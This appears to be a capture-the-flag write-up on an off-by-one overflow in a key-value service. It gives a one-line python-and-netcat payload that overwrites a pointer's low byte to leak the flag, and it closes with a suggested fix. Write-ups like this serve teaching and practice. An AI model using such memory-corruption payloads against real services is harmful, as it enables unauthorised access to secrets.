Analysis of the bug
===================

The `p` command of the `child()` function, while reading the value
of the key, doesn't account for the `:` character already put into
the `key` buffer.  The last byte of the key will thus overwrite
the least significant byte of the `value` pointer.

Attack plan
===========

The idea is to redirect a `value` pointer and let it point to the secret
key. In this way the key can be overwritten to remove the initial
`:`; then, the flag can be read by searching the overwritten key.

Attack implementation
=====================

We want to let some `value` point to `entries[0]`. If `value`
and `entries[0]` are sufficiently close, we can create the
alias by overwriting a single byte: this also defeats ASLR,
since we don't need to know the other bytes of the address.
ASLR, moreover, cannot change the value of the least significant 12 bits
of `entries[0]`, so we can find its LSB by running the binary in
a debugger. Brute forcing is also easy: addresses returned by `malloc()`
are aligned to 16, so there are only 16 (256/16) possible bytes to test.

In our case, the LSB of `entries[0]` is 0x30. The following attack
will reveal the flag:
```sh
export PYTHONIOENCODING=iso-8859-1
python3 -c 'print("p8\n"+"A"*7+"\x30"+"B"*8+"s"+"B"*8)' | nc $HOST $PORT
```
First we send the `p` command to trigger the bug, then we send 7 padding
bytes, followed by the 0x30 byte which will overwrite the LSB of
the `value` field in `entries[1]`, transforming it into `entries[0]`.
Now, the 8 `B`s will overwrite the `key` field of `entries[0]`.
The final `s` command will find and print the flag.

Suggested fix
=============

The `child()` function should pass `KEYSZ-1` to `readn()` when
processing the `p` command.